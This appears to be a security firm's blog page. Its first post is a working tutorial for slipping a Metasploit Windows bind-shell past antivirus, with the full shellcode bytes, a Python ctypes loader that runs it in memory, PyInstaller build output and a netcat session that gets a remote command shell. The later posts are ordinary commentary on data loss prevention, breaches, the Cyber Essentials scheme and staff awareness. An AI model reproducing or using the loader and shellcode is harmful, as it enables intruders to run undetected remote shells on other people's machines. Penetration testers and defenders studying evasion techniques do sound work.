Skip to content

Execute Shellcode, Bypassing Anti-Virus…

by

Hello,

I am going to demonstrate a little trick to allow you to bypass anti-virus and execute shellcode, this is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell, however any shellcode can be used, I have simply chosen this one for simplicity.

As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.

So, first of all let’s generate a Metasploit payload:

root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "\n" "," | sed s'/,//g' && echo ""
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5
root@kali:~#

Copy the line of shellcode that gets returned, we will paste it into the binary later. Be aware, if you do change the payload the above command will not work as it is specific to that payload (for extracting the opcodes from the msfpayload output).

Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.

The following piece of Python code takes shellcode as input and moves it into the newly created memory space, finally executing it and bypassing anti-virus. Using VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject we achieve this. Here is the Python code:

#!C:\Python27\python.exe

from ctypes import *

# Grab shellcode from the user so its not hardcoded.
sc = bytearray(input("Paste the shellcode inside single quotes:\n\n"))
print "\n\nRunning shellcode in memory...\n\n"

# Reserves or commits a region of pages in the virtual address space of the calling process.
pointer = windll.kernel32.VirtualAlloc(c_int(0),
                                   c_int(len(sc)),
                                   c_int(0x3000),
                                   c_int(0x40))
 
buffer = (c_char * len(sc)).from_buffer(sc)
 
# The RtlMoveMemory routine copies the contents of a source memory block to a destination 
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(pointer),
                              buffer,
                              c_int(len(sc)))
# Creates a thread to execute within the virtual address space of the calling process.
ht = windll.kernel32.CreateThread(c_int(0),
                                  c_int(0),
                                  c_int(pointer),
                                  c_int(0),
                                  c_int(0),
                                  pointer(c_int(0)))
# Waits until the specified object is in the signaled state or the time-out interval elapses. 
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, you're shellcode has been injected into memory and should be running..."

Take the above Python script and compile it to an win32 executable using PyInstaller:

C:\Users\mike.evans\Desktop\AV>c:\Python27\Scripts\pyinstaller.exe -F crypter2.py
82 INFO: wrote C:\Users\mike.evans\Desktop\AV\crypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:\Users\mike.evans\Desktop\AV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
2058 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_importers.py
3628 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_archive.py
3693 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_carchive.py
3752 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:\Windows\system32\python27.dll
4450 INFO: Warnings written to C:\Users\mike.evans\Desktop\AV\build\crypter2\warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:\Users\mike.evans\Desktop\AV\dist\crypter2.exe

Now we have the binary, lets check VirusTotal and see what it scores:

vt

Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:

C:\Users\mike.evans\Desktop\AV\dist>crypter2.exe
Paste the shellcode inside single quotes:

'\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5'

Running shellcode in memory...

Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:

dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\mike.evans\Desktop\AV\dist>whoami
whoami
win-2q626uv3pte\mike.evans

C:\Users\mike.evans\Desktop\AV\dist>

This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.

Date Loss Prevention Is Becoming Increasingly Complex – And there is No Simple Solution

by

As businesses and organisations incorporate an ever growing number of solutions, platforms and applications into their IT operations, it goes without saying that the scope for data loss, and it’s prevention, rises in tandem.   It’s a drum we have been banging for some time now but two stories in the news this week further highlighted that there is more than one vector for data loss in modern business – and removing one doesn’t reduce that burden.

First up is the widely reported news that the German government is considering reverting to old fashioned type-writers to counter the threat of the NSA snooping on sensitive communications. If indeed this goes ahead and German agencies start typewriters for confidential documents it will, in essence, be removing one set of data protection problems only to replace them with another. While documents will no longer be directly accessible by the internet, wearables and smartphones mean that they are only a photograph away from becoming digital. We often forget that information in paper files and documents can be just as sensitive, and prone to mishandling, as electronic data – so going offline is not a silver bullet for data loss prevention.

Also in the news this week has been reports that Android apps ask for far too many device and data permissions, leaving businesses that utilise them with a potential data protection headache. With applications often requiring a variety of access permissions both businesses and employees need to be aware of what potentially sensitive data they are making accessible to people outside the organisation. For instance if an application that requires address book access is running on a corporate device do you really want to give that app access to your corporate address book? This obviously adds another layer to, and raises more questions about, an organisations data loss prevention policy.

One week’s worth of news just goes to show that all information, irrespective of format or device, needs to be considered in data security audits and should be covered by policies that govern its access, usage, storage and disposal – even if it is easier said than done!

Don’t Be Left in the Dark with Data Security

by

With the action easing up in Brazil this week you may have seen reports circulating about a malware attack on more than 1,000 energy companies across Europe and North America. The attack was carried out by a group of attackers known by the name of Dragonfly. Dragonfly have been in operation since 2011 and previously targeted defence and aviation companies in the USA and Canada.

Research carried out by Symantec found that Dragonfly turned its attentions to Energy companies in early 2013 and managed to compromise 1,000 strategically important organizations for spying purposes. Dragonfly infiltrated the organisations using phishing attempts in the form of spam emails sent to senior executives with infected PDFs attached to infiltrate the network.  Disturbingly, if they had used the sabotage capabilities open to them, the group could have caused untold damage and disruption to the energy supply in the affected countries.

It is cause for concern that critical infrastructure could have been damaged or interfered with simply because staff were not cautious enough in their approach to suspicious emails. This attack goes to show just how important staff education about cyber-security is in protecting an organisation of any size. One uninformed employee can undo a whole security infrastructure – or even risk plunging people into darkness – with a single click.

The first rule of DLP: know where your sensitive data is

by

A Ponemon Institute study released this week reported that only 16% of IT security professionals know where sensitive data is located on their organization’s computer systems – leaving the overwhelming majority left guessing where their data loss prevention efforts should be directed.

The study surveyed 1,587 IT security professionals whose jobs include helping protect sensitive or confidential structured and unstructured data – with only 7% of respondents knowing the location of all sensitive unstructured data, including in emails and documents.  As such, not knowing where their organization’s sensitive or confidential data is located was identified as the biggest worry for IT security professionals, eclipsing both hacker attacks and insider threats – and rightfully so!

It should go without saying that knowing where data is located should be a prerequisite for sound IT security but we know from our own experience that too often this isn’t the case. With the threat of data loss and cyber-attacks growing as an increasing number of criminals become digitally savvy organisations can little afford to be unsure where data is stored and where their efforts to protect it should be focussed. We’ve said it before, and we’ll no doubt say it again, the first phase of solid Data Loss Prevention is ultimately knowing where the data is.

The full story can be found here.

600,000 Customers Data Sliced from Domino’s

by

You may have seen this week’s news that 600,000 customer records were stolen from pizza chain Domino’s, yet again raising questions about just how seriously large corporations and big brands are taking data protection. It is the second time in less than a month that we have seen customers’ personal details compromised after the records of 145 million people were affected by a breach of eBay’s networks.

For a period of time hackers had turned their attentions away from big businesses as they were seen as too tough a target and as a result they turned their attentions to smaller, less resourced targets. However, it would appear that in this period larger organisations have become complacent in their security practices and hackers have been quick to once again re-focus their efforts onto big, data rich organisations.

Although it is not certain exactly what records have been affected, it is staggering that the personal details of so many customers were seemingly left unencrypted and susceptible to this kind of attack – especially when you consider the warning shots that have been issued with previous high profile attacks.  The possibility that a large organisation could even consider leaving data as plain text on a server is surprising to say the least.

Business of all sizes should be reviewing their data handling and storage practices as a matter of urgency in the coming days and weeks to ensure that they are not unwittingly offering an easy target for hackers.  You can find a more detail comment about this from Pentura MD Steve Smith on the security portal, Net Security, here.

Pentura Named as a Certified Provider for UK Cyber Essentials Scheme

by

We are proud to announce this week that Pentura has been named as an accredited security provider under the recently launched Cyber Essentials Scheme.  Launched last week by the UK Government, and managed and reviewed by regulator CREST, the scheme is part of UK Government’s National Cyber Security Strategy and provides an independent assessment of the essential security controls that organisations need to have in place to mitigate risks from internet-borne threats. This includes internet connected end-user devices such as desktop PCs, laptops, tablets and smartphones, and internet connected systems including email, web and application servers.

Announcing the launch Universities and Science Minister David Willetts said: “We already spend more online than any other major country in the world, and this is in no small part because Britain is already a world leader in cybersecurity. Developing this new scheme will give consumers further confidence that business and government have defences in place to protect against the most common cyber threats.”

In essence it represents a base level standard that all organisations should look at meeting, and has specifically been designed with smaller organisations in mind.  Given the ongoing battle against large scale attacks, such as Zeus and CryptoLocker, the scheme will hopefully give both consumers and businesses further confidence that the organisations they deal with have appropriate security measures and defences in place to protect against cyber threats.

If you are interested in an assessment, or getting help in improving your organisation’s security stance, please contact us: info@pentura.com

Making Staff Awareness of Security Threats an Ongoing Process

by

You may have seen this week that Dropbox links have become the latest vector for phishing and malware attacks to try and harvest user details and valuable business data. Given Dropbox is the leading file storage and sharing application for business this is hardly shocking.  What may be more surprising though is that these latest attacks can be more easily identified, and prevented, if staff are made aware of the potential threat.  This once again highlights the importance of user education in reducing the risk of breaches, as Pentura managing director Steve Smith comments in the article.

Whilst staff training and awareness of cyber-security threats has undoubtedly improved, a common mistake is treating it as a one off box-ticking exercise rather than a continual process.

Incidents such as these just go to demonstrate that a continual awareness programme can be as effective a line of defence as the multitude of software products that are utilised by organisations. Furthermore it really brings home that a lack of security awareness amongst staff can easily undermine all other layers of defence – and is potentially just as dangerous as the attempted attacks themselves.

Follow

Get every new post delivered to your Inbox.

Join 120 other followers